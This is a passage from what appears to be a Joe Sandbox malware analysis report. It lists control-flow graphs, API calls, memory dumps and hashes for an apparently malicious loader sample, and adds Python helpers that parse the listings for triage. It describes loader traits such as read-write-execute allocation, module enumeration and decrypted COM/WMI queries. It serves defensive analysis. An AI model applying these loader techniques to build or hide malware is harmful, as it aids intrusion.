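if __name__ == "__main__":
    for addr, apis in summarize(SAMPLE_GRAPH).items():
        print(addr, ", ".join(apis))
    print("loader-like entries:",
          roots_calling(SAMPLE_GRAPH, ["VirtualAlloc", "VirtualProtect", "LoadLibraryA"]))
```

Feed the complete dump from the report as `text` to get one line per entry point; self-loops such as bd97b9 -> bd97b9 are ignored when picking entry points, and a malformed dump (an edge that names an undefined node, or an id with no address) raises ValueError rather than producing a partial graph.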

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

                                                                                                                                                                                                                                                                          Control-flow Graph

control_flow_graph:
• Block 242: 43a9b0-43a9e2, calls LdrInitializeThunk
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                          • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                          • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 ae003c-ae0047 1 ae004c-ae0263 call ae0a3f call ae0e0f call ae0d90 VirtualAlloc 0->1 2 ae0049 0->2 17 ae028b-ae0292 1->17 18 ae0265-ae0289 call ae0a69 1->18 2->1 20 ae02a1-ae02b0 17->20 22 ae02ce-ae03c2 VirtualProtect call ae0cce call ae0ce7 18->22 20->22 23 ae02b2-ae02cc 20->23 29 ae03d1-ae03e0 22->29 23->20 30 ae0439-ae04b8 VirtualFree 29->30 31 ae03e2-ae0437 call ae0ce7 29->31 32 ae04be-ae04cd 30->32 33 ae05f4-ae05fe 30->33 31->29 35 ae04d3-ae04dd 32->35 36 ae077f-ae0789 33->36 37 ae0604-ae060d 33->37 35->33 42 ae04e3-ae0505 LoadLibraryA 35->42 40 ae078b-ae07a3 36->40 41 ae07a6-ae07b0 36->41 37->36 43 ae0613-ae0637 37->43 40->41 44 ae086e-ae08be LoadLibraryA 41->44 45 ae07b6-ae07cb 41->45 46 ae0517-ae0520 42->46 47 ae0507-ae0515 42->47 48 ae063e-ae0648 43->48 52 ae08c7-ae08f9 44->52 49 ae07d2-ae07d5 45->49 50 ae0526-ae0547 46->50 47->50 48->36 51 ae064e-ae065a 48->51 53 ae07d7-ae07e0 49->53 54 ae0824-ae0833 49->54 55 ae054d-ae0550 50->55 51->36 56 ae0660-ae066a 51->56 57 ae08fb-ae0901 52->57 58 ae0902-ae091d 52->58 59 ae07e4-ae0822 53->59 60 ae07e2 53->60 64 ae0839-ae083c 54->64 61 ae0556-ae056b 55->61 62 ae05e0-ae05ef 55->62 63 ae067a-ae0689 56->63 57->58 59->49 60->54 65 ae056f-ae057a 61->65 66 ae056d 61->66 62->35 67 ae068f-ae06b2 63->67 68 ae0750-ae077a 63->68 64->44 69 ae083e-ae0847 64->69 71 ae057c-ae0599 65->71 72 ae059b-ae05bb 65->72 66->62 73 ae06ef-ae06fc 67->73 74 ae06b4-ae06ed 67->74 68->48 75 ae084b-ae086c 69->75 76 ae0849 69->76 83 ae05bd-ae05db 71->83 72->83 77 ae06fe-ae0748 73->77 78 ae074b 73->78 74->73 75->64 76->44 77->78 78->63 83->55
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 00AE024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: e3268054eea07ba59a32516f66c61ea0f5b02ef71bdb6b0128b486beacee1036
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF526874A00269DFDB64CF69C984BA8BBB1BF09304F1480D9E94DAB351DB70AE85DF14

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 123 43ab0b-43ab1f 124 43ab20-43ab7b 123->124 124->124 125 43ab7d-43abce GetForegroundWindow call 43c7d0 124->125
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID: ilmn
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                          • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 129 bd9a86-bd9a9f 130 bd9aa1-bd9aa3 129->130 131 bd9aaa-bd9ab6 CreateToolhelp32Snapshot 130->131 132 bd9aa5 130->132 133 bd9ab8-bd9abe 131->133 134 bd9ac6-bd9ad3 Module32First 131->134 132->131 133->134 140 bd9ac0-bd9ac4 133->140 135 bd9adc-bd9ae4 134->135 136 bd9ad5-bd9ad6 call bd9745 134->136 141 bd9adb 136->141 140->130 140->134 141->135
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00BD9AAE
                                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00BD9ACE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BD9000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_bd9000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction ID: d2cc6a4012caa10632de3ba81dcc35d8cd28f5521baacf69bd72d060a3d5ac70
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0F6362007116FD7207BF59C8CB6EB6E8EF49720F1001AAE646911C0EB70EC054660

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 142 ae0e0f-ae0e24 SetErrorMode * 2 143 ae0e2b-ae0e2c 142->143 144 ae0e26 142->144 144->143
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,00AE0223,?,?), ref: 00AE0E19
                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,00AE0223,?,?), ref: 00AE0E1E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction ID: 155e04ec968ad5c2af416ab200fdff24a25cec356725680222c81b7ef9aa53b1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53D0123114512877D7002B95DC09BCD7B1CDF05B62F008421FB0DD9080C7B0994046E5

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
control_flow_graph 238 43ab91-43aba8 GetForegroundWindow call 43c7d0 241 43abad-43abce 238->241
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
• Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Control-flow Graph

control_flow_graph 243 438e70-438e7c 244 438e83-438e8e call 43bf00 RtlFreeHeap 243->244 245 438e94-438e95 243->245 244->245
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction ID: 85901e1c641484a1e9593b863e702362ecf9fc70d5eef9c3d2e46bbe4163b786
• Opcode Fuzzy Hash: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
• Instruction Fuzzy Hash: 63D01235405526EBC6101F24FC06B863A54EF49321F030461B540AF076C734DC908AD8

Control-flow Graph

control_flow_graph 248 438e47-438e4a 249 438e51-438e55 RtlAllocateHeap 248->249
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction ID: 4c59684187f8c9fc8ebab3782fe1e1f4842940d007367fb0e8ab7bd4dbd8a192
• Opcode Fuzzy Hash: bde11014aa9fadb2486ac873e4c51e0b14130d9e3c259129d8d0e778167120a1
• Instruction Fuzzy Hash: A0C0927C142211FBD2211B21AC5EF6B3E38FB83B63F104124F209580B287649011DA6E

Control-flow Graph

control_flow_graph 250 438e51-438e55 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 00438E55
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction ID: 3dd49d49275fbb255d04589a33f94784ad2ffd24471d3276aa8c957077778349
• Opcode Fuzzy Hash: 1129b59f0d67bf13eed9448a42768f07b4682826011a39e0f4462efca5d079f4
• Instruction Fuzzy Hash: 8AA0223C002200EBC2200B20AC0EF2B3E38FB83B23F000030F00C080B283308000CA2E
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00BD9796
The arguments decode to lpAddress = NULL, dwSize unresolved, flAllocationType = 0x1000 (MEM_COMMIT) and flProtect = 0x40 (PAGE_EXECUTE_READWRITE), i.e. a fresh read-write-execute allocation, requested from a memory region that the dump below does not attribute to a PE image.
Memory Dump Source
• Source File: 00000003.00000002.1856198890.0000000000BD9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00BD9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_bd9000_3247.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 0136232ea0bd800b56928e892678f50787114df7a4b16685d932a71e461c233e
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: C3112B79A00208EFDB01DF98C985E98BBF5AF08750F058095F9489B362D371EA50DF80
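Working through these listings at scale means parsing them rather than reading them. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses the text form of a control_flow_graph line and the API bullets into structured records, maps a call-site address back to the basic block it sits in, and names the RPC security constants in a CoSetProxyBlanket reference such as the one listed in the next entry. The sample lines are copied from this section; the record layout and function names are this example's own.

```python
"""Structured parsing of Joe Sandbox disassembly-listing entries.

Added example, not part of the Joe Sandbox report or its tooling. The sample
lines below are copied from the listing in this section.
"""
import re
from dataclasses import dataclass, field

# Constructed sample input: the text form of one control-flow graph and a few
# API bullets exactly as they appear in the listing (bullet character included).
SAMPLE_CFG = ("control_flow_graph 243 438e70-438e7c 244 438e83-438e8e call 43bf00 "
              "RtlFreeHeap 243->244 245 438e94-438e95 243->245 244->245")
SAMPLE_APIS = [
    "• RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E",
    "• GetForegroundWindow.USER32 ref: 0043AB9F",
    "• SysAllocString.OLEAUT32(w!s#), ref: 004364FB",
    "• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,"
    "00000000,00000000), ref: 004364A7",
]

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-fA-F]+)-([0-9a-fA-F]+)$")
# "API.Module(args), ref: ADDR"; the argument list is absent for some entries.
API_RE = re.compile(r"^\s*•?\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")


@dataclass
class Node:
    node_id: int
    start: int                                  # first address of the basic block
    end: int                                    # last address of the basic block
    labels: list = field(default_factory=list)  # e.g. ["call", "43bf00", "RtlFreeHeap"]


@dataclass
class ApiRef:
    api: str
    module: str
    args: list   # raw argument tokens; "?" means the sandbox could not resolve the value
    ref: int     # address of the call instruction


def parse_cfg(line):
    """Turn a 'control_flow_graph ...' line into ({node_id: Node}, [(src, dst), ...])."""
    toks = line.split()
    if not toks or toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    nodes, edges, current, i = {}, [], None, 1
    while i < len(toks):
        tok = toks[i]
        edge = EDGE_RE.match(tok)
        rng = RANGE_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok.isdigit() and rng:          # "<id> <start>-<end>" opens a new block
            current = Node(int(tok), int(rng.group(1), 16), int(rng.group(2), 16))
            nodes[current.node_id] = current
            i += 1                           # the range token is consumed as well
        elif current is not None:            # anything else annotates the current block
            current.labels.append(tok)
        else:
            raise ValueError(f"unexpected token before first block: {tok!r}")
        i += 1
    for src, dst in edges:                   # reject graphs that reference unknown blocks
        if src not in nodes or dst not in nodes:
            raise ValueError(f"edge {src}->{dst} references an unknown block")
    return nodes, edges


def parse_api(line):
    """Parse one API bullet; returns None for lines that are not API references."""
    m = API_RE.match(line)
    if not m:
        return None
    api, module, raw_args, ref = m.groups()
    args = [a.strip() for a in raw_args.split(",")] if raw_args else []
    return ApiRef(api, module, args, int(ref, 16))


def block_for(nodes, addr):
    """Return the basic block whose address range contains addr, or None."""
    return next((n for n in nodes.values() if n.start <= addr <= n.end), None)


# Windows SDK constants (rpcdce.h) for the CoSetProxyBlanket security parameters.
AUTHN_SVC = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE", 10: "RPC_C_AUTHN_WINNT"}
AUTHZ_SVC = {0: "RPC_C_AUTHZ_NONE", 1: "RPC_C_AUTHZ_NAME", 2: "RPC_C_AUTHZ_DCE"}
AUTHN_LEVEL = {i: "RPC_C_AUTHN_LEVEL_" + n for i, n in enumerate(
    ["DEFAULT", "NONE", "CONNECT", "CALL", "PKT", "PKT_INTEGRITY", "PKT_PRIVACY"])}
IMP_LEVEL = {i: "RPC_C_IMP_LEVEL_" + n for i, n in enumerate(
    ["DEFAULT", "ANONYMOUS", "IDENTIFY", "IMPERSONATE", "DELEGATE"])}


def describe_proxy_blanket(ref):
    """Name the settings of CoSetProxyBlanket(pProxy, dwAuthnSvc, dwAuthzSvc,
    pServerPrincName, dwAuthnLevel, dwImpLevel, pAuthInfo, dwCapabilities)."""
    if ref.api != "CoSetProxyBlanket" or len(ref.args) != 8:
        raise ValueError("not a complete CoSetProxyBlanket reference")

    def name(table, tok):
        if tok == "?":
            return "unresolved"
        v = int(tok, 16)
        return table.get(v, f"{v:#x}")

    return {"dwAuthnSvc": name(AUTHN_SVC, ref.args[1]), "dwAuthzSvc": name(AUTHZ_SVC, ref.args[2]),
            "dwAuthnLevel": name(AUTHN_LEVEL, ref.args[4]), "dwImpLevel": name(IMP_LEVEL, ref.args[5])}


def summarize(cfg_line, api_lines):
    """Per-function triage record: block/edge counts, APIs referenced, call site -> block."""
    nodes, edges = parse_cfg(cfg_line)
    refs = [r for r in map(parse_api, api_lines) if r is not None]
    sites = {}
    for r in refs:
        b = block_for(nodes, r.ref)
        sites[f"{r.ref:08X}"] = b.node_id if b else None   # None: call site outside this graph
    return {"blocks": len(nodes), "edges": len(edges),
            "apis": sorted({f"{r.module}!{r.api}" for r in refs}), "call_sites": sites}


if __name__ == "__main__":
    print(summarize(SAMPLE_CFG, SAMPLE_APIS))
    print(describe_proxy_blanket(parse_api(SAMPLE_APIS[3])))
```

The cross-check worth keeping is `block_for`: the RtlFreeHeap reference at 00438E8E must land in the block 438e83-438e8e that the graph labels with that call, and a reference that does not land in any block belongs to a different function's entry.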
APIs
• CoCreateInstance.OLE32(0043F68C,00000000,00000001,0043F67C), ref: 0043640E
• SysAllocString.OLEAUT32(FA46F8B5), ref: 0043646A
• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
The CoSetProxyBlanket arguments decode to dwAuthnSvc = RPC_C_AUTHN_WINNT, dwAuthzSvc = RPC_C_AUTHZ_NONE, dwAuthnLevel = RPC_C_AUTHN_LEVEL_CALL and dwImpLevel = RPC_C_IMP_LEVEL_IMPERSONATE, the values used in the standard WMI client setup; together with CoCreateInstance, the BSTR allocations and the VARIANT handling in this function, that is the call pattern of a COM query whose string arguments are decrypted at run time (the CLSID and IID at 0043F68C and 0043F67C are not resolved here).
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_3247.jbxd
Yara matches
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
• String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
• API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                          • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
